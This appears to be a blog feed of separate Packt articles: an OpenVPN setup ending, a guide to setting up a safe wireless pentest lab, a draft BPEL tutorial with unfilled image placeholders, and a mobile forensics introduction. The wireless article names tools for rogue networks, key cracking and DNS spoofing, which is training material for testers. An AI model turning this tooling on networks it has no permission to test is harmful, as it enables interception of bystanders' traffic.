To create a client-to-site VPN connection, we need to perform the following steps:

Enable the OpenVPN server on Untangle-03.
Create an individual client type client on Untangle-03.
Distribute the client to the intended user (that is, 192.168.1.7).
Install OpenVPN on your laptop.
Connect using the installed OpenVPN and try to ping Acme-DC01 using its name. The ping will fail because the client is not able to query the Acme DNS.
So, in the Default Group settings, change Push DNS Domain to Acme.local. Changing the group settings will not affect the OpenVPN client until the client is restarted. After a restart, the ping will succeed.

Summary

In this article, we covered the VPN services provided by Untangle NGFW. We went deep into understanding how each solution works, and the article also provided a guide on how to configure and deploy the services. Untangle provides a free solution that is based on the well-known open source OpenVPN, which provides an SSL-based VPN.
Wireless and Mobile Hacks

Packt
22 Jul 2014
6 min read
(For more resources related to this topic, see here.)

So I don't think it's possible to go to a conference these days and not see a talk on mobile or wireless. (They tend to schedule the streams to have both mobile and wireless talks at the same time—the sneaky devils. There is no escaping the wireless knowledge!) So, it makes sense that we work out some ways of training people how to skill up on these technologies. We're going to touch on some older vulnerabilities that you don't see very often, but as always, when you do, it's good to know how to insta-win.

Wireless environment setup

This article is a bit of an odd one, because with Wi-Fi and mobile, it's much harder to create a safe environment for your testers to work in. For infrastructure and web app tests, you can simply say, "it's on the network, yo" and they'll get the picture. However, Wi-Fi and mobile devices are almost everywhere in places that require pen testing. It's far too easy for someone to get confused and attempt to pwn a random bystander. While this sounds hilarious, it is a serious issue if that occurs. So, adhere to the following guidelines for safer testing:

Where possible, try and test away from other people and networks. If there is an underground location nearby, testing becomes simpler as floors are more effective than walls for blocking Wi-Fi signals (contrary to the firmly held beliefs of anyone who's tried to improve their home network signal). If you're an individual who works for a company, or, you know, has the money to make a Faraday cage, then by all means do the setup in there. I'll just sit here and be jealous.
Unless it's pertinent to the test scenario, provide testers with enough knowledge to identify the devices and networks they should be attacking. A good way to go is to provide the MAC address, as they very rarely collide. (MAC-randomizing tools be damned.)
If an evil network has to be created, name it something obvious and reduce the access to ensure that it is visible to as few people as possible. The naming convention we use is Connectingtomewillresultin followed by pain, death, and suffering. While this steers away the majority of people, it does appear to attract the occasional fool, but that's natural selection for you.
Once again, but it is worth repeating, don't use your home network. Especially in this case, using your home equipment could expose you to random passersby or evil neighbors. I'm pretty sure my neighbor doesn't know how to hack, but if he does, I'm in for a world of hurt.

Software

We'll be using Kali Linux as the base for this article as we'll be using the tools provided by Kali to set up our networks for attack. Everything you need is built into Kali, but if you happen to be using another build such as Ubuntu or Debian, you will need the following tools:

Iwtools (apt-get install iw): This is the wireless equivalent of ifconfig that allows the alteration of wireless adapters, and provides a handy method to monitor them.
Aircrack suite (apt-get install aircrack-ng): The basic tools of wireless attacking are available in the Aircrack suite. This selection of tools provides a wide range of services, including cracking encryption keys, monitoring probe requests, and hosting rogue networks.
Hostapd (apt-get install hostapd): Airbase-ng doesn't support WPA-2 networks, so we need to bring in the serious programs for serious people. This can also be used to host WEP networks, but getting Aircrack suite practice is not to be sniffed at.
Wireshark (apt-get install wireshark): Wireshark is one of the most widely used network analytics tools. It's not only used by pen testers, but also by people who have CISSP and other important letters after their names. This means that it's a tool that you should know about.
dnschef (https://thesprawl.org/projects/dnschef/): Thanks to Duncan Winfrey, who pointed me in this direction. DNSChef is a fantastic resource for doing DNS spoofing. Other alternatives include DNS spoof and Metasploit's Fake DNS.
Crunch (apt-get install crunch): Crunch generates strings in a specified order. While it seems very simple, it's incredibly useful. Use with care though; it has filled more than one unwitting user's hard drive.

Hardware

You want to host a dodgy network. The first question to ask yourself, after the question you already asked yourself about software, is: is your laptop/PC capable of hosting a network? If your adapter is compatible with injection drivers, you should be fine. A quick check is to boot up Kali Linux and run sudo airmon-ng start <interface>. This will put your adapter into monitor mode. If you don't have the correct drivers, it'll throw an error. Refer to a potted list of compatible adapters at http://www.aircrack-ng.org/doku.php?id=compatibility_drivers.

However, if you don't have access to an adapter with the required drivers, fear not. It is still possible to set up some of the scenarios. There are two options. The first and most obvious is "buy an adapter". I can understand that you might not have a lot of cash kicking around, so my advice is to pick up an Edimax EW-7711UAn; it's really cheap and pretty compact. It has a short range and is fairly low powered. It is also compatible with Raspberry Pi and BeagleBone, which is awesome but irrelevant.

The second option is a limited solution. Most phones on the market can be used as wireless hotspots and so can be used to set up profiles for other devices for the phone-related scenarios in this article. Unfortunately, unless you have a rare and epic phone, it's unlikely to support WEP, so that's out of the question. There are solutions for rooted phones, but I wouldn't instruct you to root your phone, and I'm most certainly not providing a guide to do so. Realistically, in order to create spoofed networks effectively and set up these scenarios, a computer is required. Maybe I'm just not being imaginative enough.
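Coming back to the adapter question: before spending money, you can ask your current hardware what it supports. The following rough Python sketch parses the output of iw list for monitor mode support; it assumes the iw utility is installed (it is on Kali):

import subprocess

# Run `iw list` and look for "monitor" under "Supported interface modes".
output = subprocess.run(["iw", "list"], capture_output=True, text=True).stdout

in_modes = False
supports_monitor = False
for line in output.splitlines():
    if "Supported interface modes" in line:
        in_modes = True
        continue
    if in_modes:
        if line.strip().startswith("*"):
            if "monitor" in line:
                supports_monitor = True
        else:
            in_modes = False  # we have left the modes block

print("Monitor mode supported" if supports_monitor else "No monitor-capable adapter found")

This is only a convenience check; the airmon-ng test above remains the definitive answer.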
test-article

Packt
16 Jul 2014
13 min read
Service Invocation

Time for action – creating the book warehousing process

Let's create the BookWarehousingBPEL BPEL process:

We will open the SOA composite by double-clicking on the Bookstore in the process tree. In the composite, we can see both Bookstore BPEL processes and their WSDL interfaces.
We will add a new BPEL process by dragging-and-dropping the BPEL Process service component from the right-hand side toolbar. An already-familiar dialog window will open, where we will specify the BPEL 2.0 version, enter the process name as BookWarehousingBPEL, modify the namespace to http://packtpub.com/Bookstore/BookWarehousingBPEL, and select Synchronous BPEL Process. We will leave all other fields to their default values:

Insert image 8963EN_02_03.png

Next, we will wire the BookWarehousingBPEL component with the BookstoreABPEL and BookstoreBBPEL components. This way, we will establish a partner link between them. First, we will create the wire to the BookstoreBBPEL component (although the order doesn't matter). To do this, you have to click on the bottom-right side of the component. Once you place the mouse pointer above the component, circles on the edges will appear. You need to start with the circle labelled as Drag to add a new Reference and connect it with the service interface circle, as shown in the following figure:

Insert image 8963EN_02_04.png

You do the same to wire the BookWarehousingBPEL component with the BookstoreABPEL component:

Insert image 8963EN_02_05.png

We should see the following screenshot. Please notice that the BookWarehousingBPEL component is wired to the BookstoreABPEL and BookstoreBBPEL components:

Insert image 8963EN_02_06.png

What just happened?

We have added the BookWarehousingBPEL component to our SOA composite and wired it to the BookstoreABPEL and BookstoreBBPEL components. Creating the wires between components means that references have been created and relations between components have been established. In other words, we have expressed that the BookWarehousingBPEL component will be able to invoke the BookstoreABPEL and BookstoreBBPEL components. This is exactly what we want to achieve with our BookWarehousingBPEL process, which will orchestrate both bookstore BPELs. Once we have created the components and wired them accordingly, we are ready to implement the BookWarehousingBPEL process.

What just happened?

We have implemented the process flow logic for the BookWarehousingBPEL process. It actually orchestrated two other services. It invoked the BookstoreA and BookstoreB BPEL processes that we've developed in the previous chapter. Here, these two BPEL processes acted like services.

First, we have created the XML schema elements for the request and response messages of the BPEL process. We have created four variables: BookstoreARequest, BookstoreAResponse, BookstoreBRequest, and BookstoreBResponse. The BPEL code for variable declaration looks like the code shown in the following screenshot:

Insert image 8963EN_02_18b.png

Then, we have added the <assign> activity to prepare a request for both the bookstore BPEL processes. Then, we have copied the BookData element from inputVariable to the BookstoreARequest and BookstoreBRequest variables. The following BPEL code has been generated:

Insert image 8963EN_02_18c.png

Next, we have invoked both the bookstore BPEL services using the <invoke> activity.
The BPEL source code reads as shown in the following screenshot:

Insert image 8963EN_02_18d.png

Finally, we have added the <if> activity to select the bookstore with the lowest stock quantity:

Insert image 8963EN_02_18e.png

With this, we have concluded the development of the book warehousing BPEL process and are ready to deploy and test it.

Deploying and testing the book warehousing BPEL

We will deploy the project to the SOA Suite process server the same way as we did in the previous chapter, by right-clicking on the project and selecting Deploy. Then, we will navigate through the options. As we redeploy the whole SOA composite, make sure the Overwrite option is selected. You should check if the compilation and the deployment have been successful.

Then, we will log in to the Enterprise Manager console, select the project bookstore, and click on the Test button. Be sure to select bookwarehousingbpel_client for the test. After entering the parameters, as shown in the following figure, we can click on the Test Web Service button to initiate the BPEL process, and we should receive an answer (Bookstore A or Bookstore B, depending on the data that we have entered).

Remember that our BookWarehousingBPEL process actually orchestrated two other services. It invoked the BookstoreA and BookstoreB BPEL processes. To verify this, we can launch the flow trace (click on the Launch Flow Trace button) in the Enterprise Manager console, and we will see that the two bookstore BPEL processes have been invoked, as shown:

Insert image 8963EN_02_19.png

An even more interesting view is the flow view, which also shows that both bookstore services have been invoked. Click on BookWarehousingBPEL to open up the audit trail:

Insert image 8963EN_02_20.png

Understanding partner links

When invoking services, we have often mentioned partner links. Partner links denote all the interactions that a BPEL process has with external services. There are two possibilities:

The BPEL process invokes operations on other services.
The BPEL process receives invocations from clients. One of the clients is the user of the BPEL process, who makes the initial invocation. Other clients are services, for example, those that have been invoked by the BPEL process, but may return replies.

Links to all the parties that BPEL interacts with are called partner links. Partner links can be links to services that are invoked by the BPEL process. These are sometimes called invoked partner links. Partner links can also be links to clients that can invoke the BPEL process. Such partner links are sometimes called client partner links. Note that each BPEL process has at least one client partner link, because there has to be a client that first invokes the BPEL process. Usually, a BPEL process will also have several invoked partner links, because it will most likely invoke several services. In our case, the BookWarehousingBPEL process has one client partner link and two invoked partner links, BookstoreABPEL and BookstoreBBPEL. You can observe this on the SOA composite design view and on the BPEL process itself, where the client partner links are located on the left-hand side, while the invoked partner links are located on the right-hand side of the design view.

Partner link types

Describing situations where the service is invoked by the process and vice versa requires selecting a certain perspective. We can select the process perspective and describe the process as requiring portTypeA on the service and providing portTypeB to the service.
Alternatively, we select the service perspective and describe the service as offering portTypeA to the BPEL process and requiring portTypeB from the process.

Partner link types allow us to model such relationships as a third party. We are not required to take a certain perspective; rather, we just define roles. A partner link type must have at least one role and can have at most two roles. The latter is the usual case. For each role, we must specify a portType that is used for interaction.

Partner link types are defined in the WSDLs. If we take a closer look at the BookWarehousingBPEL.wsdl file, we can see the following partner link type definition:

Insert image 8963EN_02_22.png

If we specify only one role, we express the willingness to interact with the service, but do not place any additional requirements on the service. Sometimes, existing services will not define a partner link type. Then, we can wrap the WSDL of the service and define partner link types ourselves.

Now that we have become familiar with the partner link types and know that they belong to WSDL, it is time to go back to the BPEL process definition, more specifically to the partner links.

Defining partner links

Partner links are concrete references to services that a BPEL business process interacts with. They are specified near the beginning of the BPEL process definition document, just after the <process> tag. Several <partnerLink> definitions are nested within the <partnerLinks> element:

<process ...>
  <partnerLinks>
    <partnerLink ... />
    <partnerLink ... />
    ...
  </partnerLinks>
  <sequence>
    ...
  </sequence>
</process>

For each partner link, we have to specify the following:

name: This serves as a reference for interactions via that partner link.
partnerLinkType: This defines the type of the partner link.
myRole: This indicates the role of the BPEL process itself.
partnerRole: This indicates the role of the partner.
initializePartnerRole: This indicates whether the BPEL engine should initialize the partner link's partner role value. This is an optional attribute and should only be used with partner links that specify the partner role.

We define both roles (myRole and partnerRole) only if the partnerLinkType specifies two roles. If the partnerLinkType specifies only one role, the partnerLink also has to specify only one role—we omit the one that is not needed.

Let's go back to our example, where we have defined the BookstoreABPEL partner link type. To define a partner link, we need to specify the partner roles, because it is a synchronous relation. The definition is shown in the following code excerpt:

Insert image 8963EN_02_23.png

With this, we have concluded the discussion on partner links and partner link types. We will continue with the parallel service invocation.

Parallel service invocation

BPEL also supports parallel service invocation. In our example, we have invoked Bookstore A and Bookstore B sequentially. This way, we need to wait for the response from the first service and then for the response from the second service. If these services take longer to execute, the response times will be added together. If we invoke both services in parallel, we only need to wait for the duration of the longer-lasting call, as shown in the following screenshot:

BPEL has several possibilities for parallel flows, which will be described in detail in Chapter 8, Dynamic Parallel Invocations. Here, we present the basic parallel service invocation using the <flow> activity.
Insert image 8963EN_02_24.png

To invoke services in parallel, or to perform any other activities in parallel, we can use the <flow> activity. Within the <flow> activity, we can nest an arbitrary number of flows, and all will execute in parallel. Let's try and modify our example so that Bookstore A and B will be invoked in parallel.

Time for action – developing parallel flows

Let's now modify the BookWarehousingBPEL process so that the BookstoreA and BookstoreB services will be invoked in parallel. We should do the following:

To invoke the BookstoreA and BookstoreB services in parallel, we need to add the Flow structured activity to the process flow just before the first invocation, as shown in the following screenshot:

Insert image 8963EN_02_25.png

We see that two parallel branches have been created. We simply drag-and-drop both the invoke activities into the parallel branches:

Insert image 8963EN_02_26.png

That's all! We can create more parallel branches if we need to, by clicking on the Add Sequence icon.

What just happened?

We have modified the BookWarehousingBPEL process so that the BookstoreA and BookstoreB <invoke> activities are executed in parallel. A corresponding <flow> activity has been created in the BPEL source code. Within the <flow> activity, both <invoke> activities are nested. Please notice that each <invoke> activity is placed within its own <sequence> activity. This would make sense if we required more than one activity in each parallel branch. The BPEL source code looks like the one shown in the following screenshot:

Insert image 8963EN_02_27.png

Deploying and testing the parallel invocation

We will deploy the project to the SOA Suite process server the same way we did in the previous sample. Then, we will log in to the Enterprise Manager console, select the project Bookstore, and click on the Test Web Service button. To observe that the services have been invoked in parallel, we can launch the flow trace (click on the Launch Flow Trace button) in the Enterprise Manager console, click on the book warehousing BPEL process, and activate the flow view, which shows that both bookstore services have been invoked in parallel.

Understanding parallel flow

To invoke services concurrently, we can use the <flow> construct. In the following example, the three <invoke> operations will perform concurrently:

<process ...>
  ...
  <sequence>
    <!-- Wait for the incoming request to start the process -->
    <receive ... />
    <!-- Invoke a set of related services, concurrently -->
    <flow>
      <invoke ... />
      <invoke ... />
      <invoke ... />
    </flow>
    ...
    <!-- Return the response -->
    <reply ... />
  </sequence>
</process>

We can also combine and nest the <sequence> and <flow> constructs, which allows us to define several sequences that execute concurrently. In the following example, we have defined two sequences, one that consists of three invocations, and one with two invocations. Both sequences will execute concurrently:

<process ...>
  ...
  <sequence>
    <!-- Wait for the incoming request to start the process -->
    <receive ... />
    <!-- Invoke two sequences concurrently -->
    <flow>
      <!-- The three invokes below execute sequentially -->
      <sequence>
        <invoke ... />
        <invoke ... />
        <invoke ... />
      </sequence>
      <!-- The two invokes below execute sequentially -->
      <sequence>
        <invoke ... />
        <invoke ... />
      </sequence>
    </flow>
    ...
    <!-- Return the response -->
    <reply ... />
  </sequence>
</process>

We can use other activities as well within the <flow> activity to achieve parallel execution.
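The latency argument behind <flow> is easy to demonstrate outside BPEL as well. In the following Python sketch, two sleep-based stubs stand in for the bookstore services (all names and timings are hypothetical); invoked in parallel, the two one-second calls finish in roughly one second instead of two:

import time
from concurrent.futures import ThreadPoolExecutor

# Stand-ins for the two bookstore services; each sleeps to simulate latency.
def invoke_bookstore_a(book_data):
    time.sleep(1.0)
    return {"bookstore": "A", "stock": 50}

def invoke_bookstore_b(book_data):
    time.sleep(1.0)
    return {"bookstore": "B", "stock": 80}

book_data = {"isbn": "978-0000000000"}

start = time.time()
with ThreadPoolExecutor(max_workers=2) as pool:
    future_a = pool.submit(invoke_bookstore_a, book_data)
    future_b = pool.submit(invoke_bookstore_b, book_data)
    response_a, response_b = future_a.result(), future_b.result()
elapsed = time.time() - start

# Prints roughly 1.0s: like <flow>, we wait only for the slower of the two calls.
print(response_a, response_b, f"{elapsed:.1f}s")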
With this, we have concluded our discussion on the parallel invocation.

Pop quiz – service invocation

Q1. Which activity is used to invoke services from BPEL processes?
<receive>
<invoke>
<sequence>
<flow>
<process>
<reply>

Q2. Which parameters do we need to specify for the <invoke> activity?
endpointURL
partnerLink
operationName
operation
portType
portTypeLink

Q3. In which file do we declare partner link types?

Q4. Which activity is used to execute service invocation and other BPEL activities in parallel?
<receive>
<invoke>
<sequence>
<flow>
<process>
<reply>

Summary

In this chapter, we learned how to invoke services and orchestrate services. We explained the primary mission of BPEL—service orchestration. It follows the concept of programming-in-the-large. We have developed a BPEL process that has invoked two services and orchestrated them. We have become familiar with the <invoke> activity and understood the service invocation's background, particularly partner links and partner link types. We also learned that from BPEL, it is very easy to invoke services in parallel. To achieve this, we use the <flow> activity. Within <flow>, we can not only nest several <invoke> activities but also other BPEL activities. Now, we are ready to learn about variables and data manipulation, which we will do in the next chapter.
Introduction to Mobile Forensics

Packt
10 Jul 2014
18 min read
(For more resources related to this topic, see here.)

In 2013, there were almost as many mobile cellular subscriptions as there were people on earth, says the International Telecommunication Union (ITU). The following figure shows the global mobile cellular subscriptions from 2005 to 2013. Mobile cellular subscriptions are growing at lightning speed and passed a whopping 7 billion early in 2014. Portio Research Ltd. predicts that mobile subscribers will reach 7.5 billion by the end of 2014 and 8.5 billion by the end of 2016.

Mobile cellular subscription growth from 2005 to 2013

Smartphones of today, such as the Apple iPhone, the Samsung Galaxy series, and BlackBerry phones, are compact forms of computers with high performance, huge storage, and enhanced functionality. Mobile phones are the most personal electronic devices that users access. They are used to perform simple communication tasks, such as calling and texting, while still providing support for Internet browsing, e-mail, taking photos and videos, creating and storing documents, identifying locations with GPS services, and managing business tasks. As new features and applications are incorporated into mobile phones, the amount of information stored on the devices is continuously growing. Mobile phones have become portable data carriers, and they keep track of all your moves. With the increasing prevalence of mobile phones in people's daily lives and in crime, data acquired from phones becomes an invaluable source of evidence for investigations relating to criminal, civil, and even high-profile cases. It is rare to conduct a digital forensic investigation that does not include a phone. Mobile device call logs and GPS data were used to help solve the attempted bombing in Times Square, New York, in 2010. The details of the case can be found at http://www.forensicon.com/forensics-blotter/cell-phone-email-forensics-investigation-cracks-nyc-times-square-car-bombing-case/.

The science behind recovering digital evidence from mobile phones is called mobile forensics. Digital evidence is defined as information and data that is stored on, received, or transmitted by an electronic device and that is used for investigations. Digital evidence encompasses any and all digital data that can be used as evidence in a case.

Mobile forensics

Digital forensics is a branch of forensic science focusing on the recovery and investigation of raw data residing in electronic or digital devices. Mobile forensics is a branch of digital forensics related to the recovery of digital evidence from mobile devices. Forensically sound is a term used extensively in the digital forensics community to qualify and justify the use of a particular forensic technology or methodology. The main principle for a sound forensic examination of digital evidence is that the original evidence must not be modified. This is extremely difficult with mobile devices. Some forensic tools require a communication vector with the mobile device, thus standard write protection will not work during forensic acquisition. Other forensic acquisition methods may involve removing a chip or installing a bootloader on the mobile device prior to extracting data for forensic examination. In cases where the examination or data acquisition is not possible without changing the configuration of the device, the procedure and the changes must be tested, validated, and documented. Following proper methodology and guidelines is crucial in examining mobile devices as it yields the most valuable data.
As with any evidence gathering, not following the proper procedure during the examination can result in the loss or damage of evidence or render it inadmissible in court. The mobile forensics process is broken into three main categories: seizure, acquisition, and examination/analysis.

Forensic examiners face some challenges while seizing the mobile device as a source of evidence. At the crime scene, if the mobile device is found switched off, the examiner should place the device in a faraday bag to prevent changes should the device automatically power on. Faraday bags are specifically designed to isolate the phone from the network. If the phone is found switched on, switching it off raises a number of concerns. If the phone is locked by a PIN or password or is encrypted, the examiner will be required to bypass the lock or determine the PIN to access the device. Mobile phones are networked devices and can send and receive data through different sources, such as telecommunication systems, Wi-Fi access points, and Bluetooth. So if the phone is in a running state, a criminal can securely erase the data stored on the phone by executing a remote wipe command. When a phone is switched on, it should be placed in a faraday bag. If possible, prior to placing the mobile device in the faraday bag, disconnect it from the network to protect the evidence by enabling flight mode and disabling all network connections (Wi-Fi, GPS, hotspots, and so on). This will also preserve the battery, which drains faster while in a faraday bag, and protect against leaks in the faraday bag.

Once the mobile device is seized properly, the examiner may need several forensic tools to acquire and analyze the data stored on the phone. Mobile device forensic acquisition can be performed using multiple methods, which are defined later. Each of these methods affects the amount of analysis required. Should one method fail, another must be attempted. Multiple attempts and tools may be necessary in order to acquire the most data from the mobile device.

Mobile phones are dynamic systems that present a lot of challenges to the examiner in extracting and analyzing digital evidence. The rapid increase in the number of different kinds of mobile phones from different manufacturers makes it difficult to develop a single process or tool to examine all types of devices. Mobile phones are continuously evolving as existing technologies progress and new technologies are introduced. Furthermore, each mobile is designed with a variety of embedded operating systems. Hence, special knowledge and skills are required from forensic experts to acquire and analyze the devices.

Mobile forensic challenges

One of the biggest forensic challenges when it comes to the mobile platform is the fact that data can be accessed, stored, and synchronized across multiple devices. As the data is volatile and can be quickly transformed or deleted remotely, more effort is required for the preservation of this data. Mobile forensics is different from computer forensics and presents unique challenges to forensic examiners. Law enforcement and forensic examiners often struggle to obtain digital evidence from mobile devices. The following are some of the reasons:

Hardware differences: The market is flooded with different models of mobile phones from different manufacturers. Forensic examiners may come across different types of mobile models, which differ in size, hardware, features, and operating system.
Also, with a short product development cycle, new models emerge very frequently. As the mobile landscape is changing each passing day, it is critical for the examiner to adapt to all the challenges and remain updated on mobile device forensic techniques.
Mobile operating systems: Unlike personal computers, where Windows has dominated the market for years, mobile devices use a much wider variety of operating systems, including Apple's iOS, Google's Android, RIM's BlackBerry OS, Microsoft's Windows Mobile, HP's webOS, Nokia's Symbian OS, and many others.
Mobile platform security features: Modern mobile platforms contain built-in security features to protect user data and privacy. These features act as a hurdle during forensic acquisition and examination. For example, modern mobile devices come with default encryption mechanisms from the hardware layer to the software layer. The examiner might need to break through these encryption mechanisms to extract data from the devices.
Lack of resources: As mentioned earlier, with the growing number of mobile phones, the tools required by a forensic examiner also grow in number. Forensic acquisition accessories, such as USB cables, batteries, and chargers for different mobile phones, have to be maintained in order to acquire those devices.
Generic state of the device: Even if a device appears to be in an off state, background processes may still run. For example, in most mobiles, the alarm clock still works even when the phone is switched off. A sudden transition from one state to another may result in the loss or modification of data.
Anti-forensic techniques: Anti-forensic techniques, such as data hiding, data obfuscation, data forgery, and secure wiping, make investigations on digital media more difficult.
Dynamic nature of evidence: Digital evidence may be easily altered either intentionally or unintentionally. For example, browsing an application on the phone might alter the data stored by that application on the device.
Accidental reset: Mobile phones provide features to reset everything. Resetting the device accidentally while examining it may result in the loss of data.
Device alteration: The possible ways to alter devices may range from moving application data and renaming files to modifying the manufacturer's operating system. In this case, the expertise of the suspect should be taken into account.
Passcode recovery: If the device is protected with a passcode, the forensic examiner needs to gain access to the device without damaging the data on the device.
Communication shielding: Mobile devices communicate over cellular networks, Wi-Fi networks, Bluetooth, and Infrared. As device communication might alter the device data, the possibility of further communication should be eliminated after seizing the device.
Lack of availability of tools: There is a wide range of mobile devices. A single tool may not support all the devices or perform all the necessary functions, so a combination of tools needs to be used. Choosing the right tool for a particular phone might be difficult.
Malicious programs: The device might contain malicious software or malware, such as a virus or a Trojan. Such malicious programs may attempt to spread over other devices over either a wired interface or a wireless one.
Legal issues: Mobile devices might be involved in crimes that cross geographical boundaries. In order to tackle these multijurisdictional issues, the forensic examiner should be aware of the nature of the crime and the regional laws.
Mobile phone evidence extraction process

Evidence extraction and forensic examination of each mobile device may differ. However, following a consistent examination process will assist the forensic examiner in ensuring that the evidence extracted from each phone is well documented and that the results are repeatable and defendable. There is no well-established standard process for mobile forensics. However, the following figure provides an overview of process considerations for the extraction of evidence from mobile devices. All methods used when extracting data from mobile devices should be tested, validated, and well documented. A great resource for handling and processing mobile devices can be found at http://digital-forensics.sans.org/media/mobile-device-forensic-process-v3.pdf.

Mobile phone evidence extraction process

The evidence intake phase

The evidence intake phase is the starting phase and entails request forms and paperwork to document ownership information and the type of incident the mobile device was involved in, and outlines the type of data or information the requester is seeking. Developing specific objectives for each examination is the critical part of this phase. It serves to clarify the examiner's goals.

The identification phase

The forensic examiner should identify the following details for every examination of a mobile device:

The legal authority
The goals of the examination
The make, model, and identifying information for the device
Removable and external data storage
Other sources of potential evidence

We will discuss each of them in the following sections.

The legal authority

It is important for the forensic examiner to determine and document what legal authority exists for the acquisition and examination of the device, as well as any limitations placed on the media prior to the examination of the device.

The goals of the examination

The examiner will identify how in-depth the examination needs to be based upon the data requested. The goal of the examination makes a significant difference in selecting the tools and techniques to examine the phone and increases the efficiency of the examination process.

The make, model, and identifying information for the device

As part of the examination, identifying the make and model of the phone assists in determining what tools would work with the phone.

Removable and external data storage

Many mobile phones provide an option to extend the memory with removable storage devices, such as the Trans Flash Micro SD memory expansion card. In cases where such a card is found in a mobile phone that is submitted for examination, the card should be removed and processed using traditional digital forensic techniques. It is wise to also acquire the card while it is in the mobile device to ensure that data stored on both the handset memory and the card are linked for easier analysis.

Other sources of potential evidence

Mobile phones act as good sources of fingerprint and other biological evidence. Such evidence should be collected prior to the examination of the mobile phone to avoid contamination issues, unless the collection method will damage the device. Examiners should wear gloves when handling the evidence.

The preparation phase

Once the mobile phone model is identified, the preparation phase involves research regarding the particular mobile phone to be examined and the appropriate methods and tools to be used for acquisition and examination.
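One common piece of identifying information recorded during the identification phase is the IMEI, whose fifteenth digit is a Luhn check digit. A quick validation routine, sketched below in Python, can flag a mistyped IMEI on the intake paperwork (the sample number is the well-known test IMEI from GSM documentation):

def imei_is_valid(imei: str) -> bool:
    """Validate a 15-digit IMEI using the Luhn checksum."""
    if len(imei) != 15 or not imei.isdigit():
        return False
    total = 0
    # Double every second digit from the right; subtract 9 from two-digit results.
    for i, ch in enumerate(reversed(imei)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0

print(imei_is_valid("490154203237518"))  # True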
The isolation phase

Mobile phones are by design intended to communicate via cellular phone networks, Bluetooth, Infrared, and wireless (Wi-Fi) network capabilities. When the phone is connected to a network, new data is added to the phone through incoming calls, messages, and application data, which modifies the evidence on the phone. Complete destruction of data is also possible through remote access or remote wiping commands. For this reason, isolation of the device from communication sources is important prior to the acquisition and examination of the device. Isolation of the phone can be accomplished through the use of faraday bags, which block the radio signals to or from the phone. Past research has found inconsistencies in total communication protection with faraday bags. Therefore, network isolation is advisable. This can be done by placing the phone in radio frequency shielding cloth and then placing the phone into airplane or flight mode.

The processing phase

Once the phone has been isolated from the communication networks, the actual processing of the mobile phone begins. The phone should be acquired using a tested method that is repeatable and is as forensically sound as possible. Physical acquisition is the preferred method as it extracts the raw memory data, and the device is commonly powered off during the acquisition process. On most devices, the least amount of changes occur to the device during physical acquisition. If physical acquisition is not possible or fails, an attempt should be made to acquire the file system of the mobile device. A logical acquisition should always be obtained as well; it may contain only the parsed data, but it provides pointers to examine the raw memory image.

The verification phase

After processing the phone, the examiner needs to verify the accuracy of the data extracted from the phone to ensure that the data has not been modified. The verification of the extracted data can be accomplished in several ways.

Comparing extracted data to the handset data

Check if the data extracted from the device matches the data displayed by the device. The data extracted can be compared to the device itself or a logical report, whichever is preferred. Remember, handling the original device may make changes to the only evidence: the device itself.

Using multiple tools and comparing the results

To ensure accuracy, use multiple tools to extract the data and compare the results.

Using hash values

All image files should be hashed after acquisition to ensure that the data remains unchanged. If file system extraction is supported, the examiner extracts the file system and then computes hashes for the extracted files. Later, any individually extracted file hash is calculated and checked against the original value to verify its integrity. Any discrepancy in a hash value must be explainable (for example, if the device was powered on and then acquired again, in which case the hash values will differ).

The document and reporting phase

The forensic examiner is required to document throughout the examination process in the form of contemporaneous notes relating to what was done during the acquisition and examination. Once the examiner completes the investigation, the results must go through some form of peer review to ensure that the data is checked and the investigation is complete.
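The hash comparison described under Using hash values amounts to only a few lines of code. The following is a minimal Python sketch; the image path and the recorded digest are hypothetical placeholders, and SHA-256 is used purely for illustration since the text does not mandate a particular algorithm:

import hashlib

def hash_file(path: str, chunk_size: int = 1 << 20) -> str:
    """Hash a potentially large acquisition image without loading it all into RAM."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()

# Hypothetical values: the acquired image and the digest recorded at acquisition time.
acquired_digest = hash_file("evidence/phone_image.dd")
recorded_digest = "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08"

if acquired_digest == recorded_digest:
    print("Integrity verified: image unchanged since acquisition")
else:
    print("MISMATCH: document the discrepancy and investigate")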
The examiner's notes and documentation may include information such as the following:

Examination start date and time
The physical condition of the phone
Photos of the phone and individual components
Phone status when received—turned on or off
Phone make and model
Tools used for the acquisition
Tools used for the examination
Data found during the examination
Notes from peer review

The presentation phase

Throughout the investigation, it is important to make sure that the information extracted and documented from a mobile device can be clearly presented to any other examiner or to a court. Creating a forensic report of data extracted from the mobile device during acquisition and analysis is important. This may include data in both paper and electronic formats. Your findings must be documented and presented in a manner that ensures the evidence speaks for itself when in court. The findings should be clear, concise, and repeatable. Timeline and link analysis, features offered by many commercial mobile forensics tools, will aid in reporting and explaining findings across multiple mobile devices. These tools allow the examiner to tie together the methods behind the communication of multiple devices.

The archiving phase

Preserving the data extracted from the mobile phone is an important part of the overall process. It is also important that the data is retained in a usable format for the ongoing court process, for future reference, should the current evidence file become corrupt, and for record-keeping requirements. Court cases may continue for many years before the final judgment is arrived at, and most jurisdictions require that data be retained for long periods of time for the purposes of appeals. As the field and methods advance, new methods for pulling data out of a raw, physical image may surface, and then the examiner can revisit the data by pulling a copy from the archives.

Practical mobile forensic approaches

Similar to any forensic investigation, there are several approaches that can be used for the acquisition and examination/analysis of data from mobile phones. The type of mobile device, the operating system, and the security setting generally dictate the procedure to be followed in a forensic process. Every investigation is distinct with its own circumstances, so it is not possible to design a single definitive procedural approach for all cases. The following details outline the general approaches followed in extracting data from mobile devices.

Mobile operating systems overview

One of the major factors in the data acquisition and examination/analysis of a mobile phone is the operating system. Starting from low-end mobile phones to smartphones, mobile operating systems have come a long way with a lot of features. Mobile operating systems directly affect how the examiner can access the mobile device. For example, Android OS gives terminal-level access whereas iOS does not give such an option. A comprehensive understanding of the mobile platform helps the forensic examiner make sound forensic decisions and conduct a conclusive investigation. While there is a large range of smart mobile devices, four main operating systems dominate the market, namely, Google Android, Apple iOS, RIM BlackBerry OS, and Windows Phone. More information can be found at http://www.idc.com/getdoc.jsp?containerId=prUS23946013.

Android

Android is a Linux-based operating system, and it's a Google open source platform for mobile phones. Android is the world's most widely used smartphone operating system.
